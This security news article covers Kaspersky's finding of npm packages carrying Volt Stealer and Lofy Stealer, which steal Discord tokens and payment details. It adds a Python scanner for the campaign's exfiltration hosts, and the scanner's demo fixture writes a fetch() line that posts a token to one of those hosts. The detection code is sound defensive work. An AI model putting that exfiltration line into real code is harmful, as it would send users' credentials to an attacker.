Kaspersky researchers have unearthed yet another supply chain attack campaign employing multiple malicious npm packages, this time targeting Discord users to steal their payment card information.
The malware employed in these attacks is a modified version of an open-source and Python-based Volt Stealer token logger and JavaScript malware dubbed Lofy Stealer.
“The Python malware is a modified version of an open-source token logger called Volt Stealer. It is intended to steal Discord tokens from infected machines and the victim’s IP address and upload them via HTTP,” reads the analysis published by Igor Kuznetsov and Leonid Bezvershenko.
The malware monitors the victims' actions, such as Discord logins, attempts to change the credentials, multi-factor authentication (MFA) toggles, or the addition of new payment methods to steal Discord accounts and payment information.
Subsequently, the harvested data is uploaded to the remote endpoint whose address is hardcoded (e.g., life.polarlabs.repl[.]co, sock.polarlabs.repl[.]co, idk.polarlabs.repl[.]co).
“The JavaScript malware we dubbed ‘Lofy Stealer’ was created to infect Discord client files in order to monitor the victim’s actions,” the researchers added. “It detects when a user logs in, changes email or password, enables/disables multi-factor authentication (MFA), and adds new payment methods, including complete bank card details. Collected information is also uploaded to the remote endpoint whose address is hard-coded,” the analysis further reads.
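Because both stealers exfiltrate to hard-coded hosts, the quickest triage check on a project tree or a Discord client install is to search it for those hosts. The following scanner is an added example, not Kaspersky's tooling; the host list is taken from the article (defanged there with `[.]`), and the sample files written by `build_demo_tree()` are constructed for the demonstration.

```python
"""Walk a directory tree and report files that reference the exfiltration
hosts named in the report, in live or defanged form."""
import re
import tempfile
from pathlib import Path

# Hosts quoted in the article (written there as host.repl[.]co).
INDICATOR_HOSTS = [
    "life.polarlabs.repl.co",
    "sock.polarlabs.repl.co",
    "idk.polarlabs.repl.co",
]

# One regex that matches each host whether the dots are live or "[.]".
_PATTERN = re.compile(
    "|".join(re.escape(h).replace(r"\.", r"(?:\.|\[\.\])") for h in INDICATOR_HOSTS),
    re.IGNORECASE,
)
SCAN_SUFFIXES = {".js", ".json", ".py"}


def find_indicators(text: str) -> list[str]:
    """Return the indicator hosts referenced in text, normalised to live form."""
    return sorted({m.group(0).lower().replace("[.]", ".") for m in _PATTERN.finditer(text)})


def scan_tree(root, suffixes=SCAN_SUFFIXES, max_bytes=5_000_000) -> list[tuple[str, list[str]]]:
    """Return (path relative to root, hosts found) for every file that matches."""
    root = Path(root)
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in suffixes:
            continue
        if path.stat().st_size > max_bytes:  # skip huge bundles; handle those separately
            continue
        found = find_indicators(path.read_text(encoding="utf-8", errors="ignore"))
        if found:
            hits.append((path.relative_to(root).as_posix(), found))
    return hits


def build_demo_tree(root) -> None:
    """Write constructed samples: one clean package, one that phones home."""
    root = Path(root)
    (root / "node_modules/left-pad").mkdir(parents=True)
    (root / "node_modules/left-pad/index.js").write_text("module.exports = (s, n) => s.padStart(n);\n")
    (root / "node_modules/evil-pkg").mkdir(parents=True)
    (root / "node_modules/evil-pkg/index.js").write_text(
        'fetch("https://life.polarlabs.repl.co/upload", {method: "POST", body: token});\n')
    (root / "node_modules/evil-pkg/setup.py").write_text('URL = "http://SOCK.polarlabs.repl.co/"\n')


def demo() -> list[tuple[str, list[str]]]:
    """Build the constructed sample tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        return scan_tree(tmp)
```

Run `scan_tree("node_modules")` or point it at the Discord client's modules directory; a hit is a reason to quarantine the package and rotate the affected Discord token and payment details.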
Kaspersky states that it continuously monitors repository updates in order to rapidly scan for and remove all new malicious packages.
According to the researchers, this pattern recurs among malicious npm packages, and the campaign is just one of a seemingly endless stream of info-stealing malware specifically designed to target Discord users in recent years.
For example, in 2019, malware dubbed Spidey Bot was employed to alter the Windows Discord client in order to backdoor it and deploy an information-stealing trojan. Last year, malicious npm and PyPI libraries were also employed to target Discord users, steal their user tokens and browser information, and deploy MBRLocker data-wiping malware called Monster Ransomware.
Earlier this year, JFrog researchers uncovered multiple malicious packages in the npm registry that specifically targeted several popular media, logistics, and industrial companies based in Germany in order to carry out supply chain attacks.